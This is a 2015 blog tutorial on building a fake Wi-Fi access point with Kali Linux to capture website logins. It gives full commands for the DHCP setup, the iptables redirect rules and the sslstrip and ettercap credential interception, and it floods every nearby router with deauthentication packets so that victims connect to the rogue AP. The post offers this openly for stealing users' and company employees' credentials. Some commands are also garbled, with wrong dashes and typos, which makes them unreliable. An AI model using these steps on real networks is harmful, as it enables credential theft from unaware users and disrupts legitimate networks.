1337 World: Kali Linux Tutorial: Manually Creating a Fake AP to Capture Website Logins

Sunday 13 September 2015

Kali Linux Tutorial: Manually Creating a Fake AP to Capture Website Logins

KALI-LINUX-FAKE-AP-HACK-WEBSITE-LOGINS- picateshackz.com

We'll be setting up a fake access point where we'll be stripping the encryption of sites using HTTPS to HTTP so we can grab the inputs of the username and password fields. We'll also be sending deauthentication packets to all other routers nearby rendering them useless and forcing the user to log into our malicious access point. This can easily be used for attacks known as"waterhole attacks" where you attack a company where the employees don't even notice they are on an malicious AP because it automatically connected to the malicious one due to the other ones being shutdown.

Note: Yes, I do realize some sites are utilizing TLS, so we'll not be able to capture the logins of those sites unfortunately as the encryption mechanism will not be decrypted. (if you know a way to strip the encryption, please tell me!)

Requirements and Lab:

Kali Linux, If you have no idea about Kali Linux then i recommend you to read this article: An Introduction To Hacker’s OS: Kali Linux Setup Tutorial.
A network adapter that supports packet injection, monitor mode and master mode.
Exposure to the Linux environment and a decent amount of wireless penetration experience, Read this tutorial: Kali Linux Tutorial: Wireless Auditing with Aircrack-ng, Reaver, and Pixiewps
A functional brain that can process information.

Also Read: Easy Steps to Create Web Penetration Testing Lab in Kali Linux

Step 1: Get our default gateway

Open up Kali Linux terminal and You may do this by typing:

Code: [Select]

route -n

Under where it says "Gateway", you'll need to memorize it or write it down as we'll need to use it when we set our IP tables up later on.

Step 2: Now let's install DHCP3-server

Firstly, if you haven't done so already, type:

apt-get dist-upgrade
When that is done, now let's install DHCP server by typing:

apt-get install dhcp3-server
Now when it's done installing, we need to configure the DHCP server by typing:

nano /etc/dhcpd.conf
Now, copy and paste the following in:

Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0 {
Option routers 192.168.1.1;
Option subnet-mask 255.255.255.0;
Option domain-name “freewifi”;
Option domain-name-servers 192.168.1.1;
Range 192.168.1.2 192.168.1.40;
}

The only thing you'll need to understand here is the Option domain-name line, where it says "freewifi", you may change that to whatever you want to call your fake (and malicious) access point. For this tutorial, I'll just keep it as freewifi.
Now, just save that by typing CTRL + X and then Y then enter.

Step 3: Now let's begin monitor mode

To begin monitor mode, type:

airmon-ng start <wireless interface>
Then to attempt to prevent any issues, type:

airmon-ng check kill

Step 4: Begin the fake access point

Now that you have monitor mode all set up, now let's begin the fake access point:

airbase-ng -c 11 -e <fake AP name> <monitor mode>
Now you have began the fake AP, however, if you attempt to access it, you won't be able to. Remember to not close that terminal as you need it to be online.

Step 5: Now let's set up the IP table rules

There are a lot of commands here, so I suggest setting up a shell script, and this is how you do it, first type:

nano iptables.sh
Now assuming you have basic knowledge of networking, I assume you'll read over this and manually configure some of it as some of it might not work for you.

#!/bin/sh
clear
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –t nat –A PREROUTNG –p udp –j DNAT –to <GATEWAY IP HERE>
iptables –P FORWARD ACCEPT
iptables --append FORWARD –-in-interface at0 –j ACCEPT
iptables --table nat -append POSTROUTING --out-interface eth0 –j MASQUERADE
iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 10000

Then give it permissions by typing:

chmod +x iptables.sh
Then just run it by typing:

./iptables.sh

Step 6: Starting the DHCP server

To do this, simply type in:

dhcpd –cf /etc/dhcpd.conf –pf /var/run/dhcpd.pid at0
Then to start it, type:

/etc/init.d/isc-dhcp-server start

Step 7: Starting SSLSTRIP and Ettercap

I suggest you to read my previous tutorial about Ettercap: Man In The Middle Attack Using Ettercap In Kali Linux

I assume you know what both of these tools are doing, so let's start of by starting SSLSTRIP:

sslstrip –f –p –k 10000
Leave that terminal open. Then to begin ettercap, type:

ettercap –p –u –T –q –I at0

Step 8: Sending Deauth packets to all other routers

Firstly, begin scanning for the routers by typing:

airodump-ng <monitor mode>
Then, select your target and write down their channel number(s) and BSSID(s). Then set the channels by typing:

iwconfig <monitor mode> channel <Ch. Number>
Now, to begin the deauthentication attack, type the following command:

aireplay-ng -0 5000 -a <BSSID> <monitor mode> --ignore-negative-one
Congrats, you are done, Now just sit back and wait for the users to log in and gather their data.

Credits: queryFrequency

Recommended Web Hacking Tutorials:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)